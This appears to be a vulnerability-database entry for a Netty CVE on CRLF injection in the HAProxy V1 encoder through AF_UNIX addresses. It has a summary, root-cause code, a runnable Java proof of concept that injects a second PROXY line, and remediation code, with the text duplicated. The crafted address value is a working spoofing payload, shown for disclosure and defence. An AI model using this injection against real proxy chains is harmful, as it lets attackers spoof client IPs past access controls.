Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy…
GitHub_M·CWE-93·Published 2026-07-22
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder ( HAProxyMessageEncoder ) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \r\n sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder ( HAProxyMessageEncoder ) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \r\n sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.
# Security Vulnerability Report: HAProxy V1 Protocol CRLF Injection via AF_UNIX Address in Netty ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-haproxy) | | **Component** | `io.netty.handler.codec.haproxy.HAProxyMessageEncoder` | | **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences | | **Impact** | HAProxy PROXY Protocol Injection / Client IP Spoofing | | **CVSS 3.1 Score** | **7.5 (High)** | | **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` | ## 2. Affected Components - `io.netty.handler.codec.haproxy.HAProxyMessageEncoder` — `encodeV1()` method (lines 63-77): writes `sourceAddress` and `destinationAddress` directly to output without CRLF validation - `io.netty.handler.codec.haproxy.HAProxyMessage` — constructor `checkAddress()` validates IPv4/IPv6 format but **only checks length for AF_UNIX** (line 439) ## 3. Vulnerability Description Netty's HAProxy protocol encoder writes AF_UNIX socket addresses directly into the HAProxy V1 text protocol format **without validating for CRLF characters**. The V1 protocol uses CRLF (`\r\n`) as the line terminator, so CRLF characters in an address split the single PROXY header line into multiple lines, effectively injecting a second PROXY protocol header. ### Root Cause — Encoder ```java // HAProxyMessageEncoder.java:63-77 private static void encodeV1(HAProxyMessage msg, ByteBuf out) { out.writeBytes(TEXT_PREFIX); // "PROXY " out.writeByte((byte) ' '); out.writeCharSequence(msg.proxiedProtocol().name(), US_ASCII); // "UNIX_STREAM" out.writeByte((byte) ' '); out.writeCharSequence(msg.sourceAddress(), US_ASCII); // <-- NO CRLF CHECK out.writeByte((byte) ' '); out.writeCharSequence(msg.destinationAddress(), US_ASCII); // <-- NO CRLF CHECK out.writeByte((byte) ' '); // ... out.writeByte((byte) '\r'); out.writeByte((byte) '\n'); } ``` ### Root Cause — Insufficient Address Validation ```java // HAProxyMessage.java:428-442 private static void checkAddress(String address, AddressFamily addrFamily) { switch (addrFamily) { case AF_UNIX: ObjectUtil.checkNotNull(address, "address"); if (address.getBytes(CharsetUtil.US_ASCII).length > 108) { throw new IllegalArgumentException("invalid AF_UNIX address: " + address); } return; // ONLY checks length <= 108, NO CRLF validation! case AF_IPv4: if (!NetUtil.isValidIpV4Address(address)) { ... } // Format check blocks CRLF case AF_IPv6: if (!NetUtil.isValidIpV6Address(address)) { ... } // Format check blocks CRLF } } ``` IPv4 and IPv6 addresses are validated against format rules that implicitly reject CRLF. But **AF_UNIX addresses only check `length <= 108`** — any characters including CRLF are accepted. ## 4. Exploitability Prerequisites This vulnerability is exploitable when: 1. An application uses Netty's `HAProxyMessageEncoder` to construct HAProxy V1 protocol headers 2. AF_UNIX (`UNIX_STREAM` or `UNIX_DGRAM`) addresses contain user-controlled input 3. The encoded PROXY header is sent to a downstream server or load balancer **Affected use cases**: - PROXY protocol relays that construct AF_UNIX messages from upstream data - Load balancer integrations where socket paths come from configuration or external sources - Multi-tenant proxies that dynamically construct PROXY headers ## 5. Attack Scenario ### Client IP Spoofing via Second PROXY Line Injection ```java String maliciousAddr = "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80"; HAProxyMessage msg = new HAProxyMessage( HAProxyProtocolVersion.V1, HAProxyCommand.PROXY, HAProxyProxiedProtocol.UNIX_STREAM, maliciousAddr, // CRLF-injected source address "/var/run/dest.sock", 0, 0); ``` **Wire format sent to backend**: ``` PROXY UNIX_STREAM /var/run/app.sock PROXY TCP4 10.0.0.1 10.0.0.2 1234 80 /var/run/dest.sock 0 0 ``` The backend receives **two PROXY lines**. Depending on implementation: - HAProxy: may use the first line and ignore the second - Other implementations: may use the **second** line, treating the connection as TCP4 from `10.0.0.1` - This enables **client IP spoofing** — the backend believes the client is `10.0.0.1` when it's not ## 6. Proof of Concept ### Full Runnable PoC Source Code (HAProxyUnixCRLFPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.haproxy.*; import java.nio.charset.StandardCharsets; public class HAProxyUnixCRLFPoC { public static void main(String[] args) { System.out.println("=== Netty HAProxy AF_UNIX CRLF Injection PoC ===\n"); String maliciousAddr = "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80"; String destAddr = "/var/run/dest.sock"; HAProxyMessage msg = new HAProxyMessage( HAProxyProtocolVersion.V1, HAProxyCommand.PROXY, HAProxyProxiedProtocol.UNIX_STREAM, maliciousAddr, destAddr, 0, 0); EmbeddedChannel ch = new EmbeddedChannel(HAProxyMessageEncoder.INSTANCE); ch.writeOutbound(msg); ByteBuf out = ch.readOutbound(); String encoded = out.toString(StandardCharsets.UTF_8); out.release(); ch.finishAndReleaseAll(); System.out.println("Wire format:"); for (String line : encoded.split("\n", -1)) { System.out.println(" " + line.replace("\r", "\\r")); } int proxyCount = 0; for (String line : encoded.split("\r\n")) { if (line.startsWith("PROXY")) proxyCount++; } System.out.println("PROXY lines: " + proxyCount); System.out.println("VULNERABLE: " + (proxyCount > 1 ? "YES" : "NO")); } } ``` ### How to Compile and Run ```bash JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') javac -cp "$JARS" HAProxyUnixCRLFPoC.java java -cp "$JARS:." HAProxyUnixCRLFPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty HAProxy AF_UNIX CRLF Injection PoC === [TEST 1] AF_UNIX Source Address CRLF Injection ------------------------------------------------ Source address: "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80" Wire format: PROXY UNIX_STREAM /var/run/app.sock\r PROXY TCP4 10.0.0.1 10.0.0.2 1234 80 /var/run/dest.sock 0 0\r PROXY lines found: 2 VULNERABLE: YES - Second PROXY line injected! ``` ## 7. Remediation Recommendations ### Option 1: Validate AF_UNIX Addresses for CRLF ```java // HAProxyMessage.java checkAddress() - add for AF_UNIX: case AF_UNIX: ObjectUtil.checkNotNull(address, "address"); byte[] addrBytes = address.getBytes(CharsetUtil.US_ASCII); if (addrBytes.length > 108) { throw new IllegalArgumentException("invalid AF_UNIX address: too long"); } for (byte b : addrBytes) { if (b == '\r' || b == '\n') { throw new IllegalArgumentException( "AF_UNIX address contains prohibited CRLF character"); } } return; ``` ### Option 2: Validate in Encoder ```java // HAProxyMessageEncoder.java encodeV1() - validate before writing: private static void validateV1Address(String address) { for (int i = 0; i < address.length(); i++) { char c = address.charAt(i); if (c == '\r' || c == '\n' || c == ' ') { throw new HAProxyProtocolException( "V1 address contains prohibited character at index " + i); } } } ``` ## 8. References - [HAProxy PROXY Protocol v1 Specification](https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt) - [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html) - [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86)
# Security Vulnerability Report: HAProxy V1 Protocol CRLF Injection via AF_UNIX Address in Netty ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-haproxy) | | **Component** | `io.netty.handler.codec.haproxy.HAProxyMessageEncoder` | | **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences | | **Impact** | HAProxy PROXY Protocol Injection / Client IP Spoofing | | **CVSS 3.1 Score** | **7.5 (High)** | | **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` | ## 2. Affected Components - `io.netty.handler.codec.haproxy.HAProxyMessageEncoder` — `encodeV1()` method (lines 63-77): writes `sourceAddress` and `destinationAddress` directly to output without CRLF validation - `io.netty.handler.codec.haproxy.HAProxyMessage` — constructor `checkAddress()` validates IPv4/IPv6 format but **only checks length for AF_UNIX** (line 439) ## 3. Vulnerability Description Netty's HAProxy protocol encoder writes AF_UNIX socket addresses directly into the HAProxy V1 text protocol format **without validating for CRLF characters**. The V1 protocol uses CRLF (`\r\n`) as the line terminator, so CRLF characters in an address split the single PROXY header line into multiple lines, effectively injecting a second PROXY protocol header. ### Root Cause — Encoder ```java // HAProxyMessageEncoder.java:63-77 private static void encodeV1(HAProxyMessage msg, ByteBuf out) { out.writeBytes(TEXT_PREFIX); // "PROXY " out.writeByte((byte) ' '); out.writeCharSequence(msg.proxiedProtocol().name(), US_ASCII); // "UNIX_STREAM" out.writeByte((byte) ' '); out.writeCharSequence(msg.sourceAddress(), US_ASCII); // <-- NO CRLF CHECK out.writeByte((byte) ' '); out.writeCharSequence(msg.destinationAddress(), US_ASCII); // <-- NO CRLF CHECK out.writeByte((byte) ' '); // ... out.writeByte((byte) '\r'); out.writeByte((byte) '\n'); } ``` ### Root Cause — Insufficient Address Validation ```java // HAProxyMessage.java:428-442 private static void checkAddress(String address, AddressFamily addrFamily) { switch (addrFamily) { case AF_UNIX: ObjectUtil.checkNotNull(address, "address"); if (address.getBytes(CharsetUtil.US_ASCII).length > 108) { throw new IllegalArgumentException("invalid AF_UNIX address: " + address); } return; // ONLY checks length <= 108, NO CRLF validation! case AF_IPv4: if (!NetUtil.isValidIpV4Address(address)) { ... } // Format check blocks CRLF case AF_IPv6: if (!NetUtil.isValidIpV6Address(address)) { ... } // Format check blocks CRLF } } ``` IPv4 and IPv6 addresses are validated against format rules that implicitly reject CRLF. But **AF_UNIX addresses only check `length <= 108`** — any characters including CRLF are accepted. ## 4. Exploitability Prerequisites This vulnerability is exploitable when: 1. An application uses Netty's `HAProxyMessageEncoder` to construct HAProxy V1 protocol headers 2. AF_UNIX (`UNIX_STREAM` or `UNIX_DGRAM`) addresses contain user-controlled input 3. The encoded PROXY header is sent to a downstream server or load balancer **Affected use cases**: - PROXY protocol relays that construct AF_UNIX messages from upstream data - Load balancer integrations where socket paths come from configuration or external sources - Multi-tenant proxies that dynamically construct PROXY headers ## 5. Attack Scenario ### Client IP Spoofing via Second PROXY Line Injection ```java String maliciousAddr = "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80"; HAProxyMessage msg = new HAProxyMessage( HAProxyProtocolVersion.V1, HAProxyCommand.PROXY, HAProxyProxiedProtocol.UNIX_STREAM, maliciousAddr, // CRLF-injected source address "/var/run/dest.sock", 0, 0); ``` **Wire format sent to backend**: ``` PROXY UNIX_STREAM /var/run/app.sock PROXY TCP4 10.0.0.1 10.0.0.2 1234 80 /var/run/dest.sock 0 0 ``` The backend receives **two PROXY lines**. Depending on implementation: - HAProxy: may use the first line and ignore the second - Other implementations: may use the **second** line, treating the connection as TCP4 from `10.0.0.1` - This enables **client IP spoofing** — the backend believes the client is `10.0.0.1` when it's not ## 6. Proof of Concept ### Full Runnable PoC Source Code (HAProxyUnixCRLFPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.haproxy.*; import java.nio.charset.StandardCharsets; public class HAProxyUnixCRLFPoC { public static void main(String[] args) { System.out.println("=== Netty HAProxy AF_UNIX CRLF Injection PoC ===\n"); String maliciousAddr = "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80"; String destAddr = "/var/run/dest.sock"; HAProxyMessage msg = new HAProxyMessage( HAProxyProtocolVersion.V1, HAProxyCommand.PROXY, HAProxyProxiedProtocol.UNIX_STREAM, maliciousAddr, destAddr, 0, 0); EmbeddedChannel ch = new EmbeddedChannel(HAProxyMessageEncoder.INSTANCE); ch.writeOutbound(msg); ByteBuf out = ch.readOutbound(); String encoded = out.toString(StandardCharsets.UTF_8); out.release(); ch.finishAndReleaseAll(); System.out.println("Wire format:"); for (String line : encoded.split("\n", -1)) { System.out.println(" " + line.replace("\r", "\\r")); } int proxyCount = 0; for (String line : encoded.split("\r\n")) { if (line.startsWith("PROXY")) proxyCount++; } System.out.println("PROXY lines: " + proxyCount); System.out.println("VULNERABLE: " + (proxyCount > 1 ? "YES" : "NO")); } } ``` ### How to Compile and Run ```bash JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') javac -cp "$JARS" HAProxyUnixCRLFPoC.java java -cp "$JARS:." HAProxyUnixCRLFPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty HAProxy AF_UNIX CRLF Injection PoC === [TEST 1] AF_UNIX Source Address CRLF Injection ------------------------------------------------ Source address: "/var/run/app.sock\r\nPROXY TCP4 10.0.0.1 10.0.0.2 1234 80" Wire format: PROXY UNIX_STREAM /var/run/app.sock\r PROXY TCP4 10.0.0.1 10.0.0.2 1234 80 /var/run/dest.sock 0 0\r PROXY lines found: 2 VULNERABLE: YES - Second PROXY line injected! ``` ## 7. Remediation Recommendations ### Option 1: Validate AF_UNIX Addresses for CRLF ```java // HAProxyMessage.java checkAddress() - add for AF_UNIX: case AF_UNIX: ObjectUtil.checkNotNull(address, "address"); byte[] addrBytes = address.getBytes(CharsetUtil.US_ASCII); if (addrBytes.length > 108) { throw new IllegalArgumentException("invalid AF_UNIX address: too long"); } for (byte b : addrBytes) { if (b == '\r' || b == '\n') { throw new IllegalArgumentException( "AF_UNIX address contains prohibited CRLF character"); } } return; ``` ### Option 2: Validate in Encoder ```java // HAProxyMessageEncoder.java encodeV1() - validate before writing: private static void validateV1Address(String address) { for (int i = 0; i < address.length(); i++) { char c = address.charAt(i); if (c == '\r' || c == '\n' || c == ' ') { throw new HAProxyProtocolException( "V1 address contains prohibited character at index " + i); } } } ``` ## 8. References - [HAProxy PROXY Protocol v1 Specification](https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt) - [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html) - [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86)
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | cve.org | 5.5 | — | — | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Primary | cve.org | 5.5 | — | — | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | ENISA EUVD | 5.5 | — | — | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | NVD | 5.5 | 1.8 | 3.6 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | GHSA | 5.5 | — | — | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |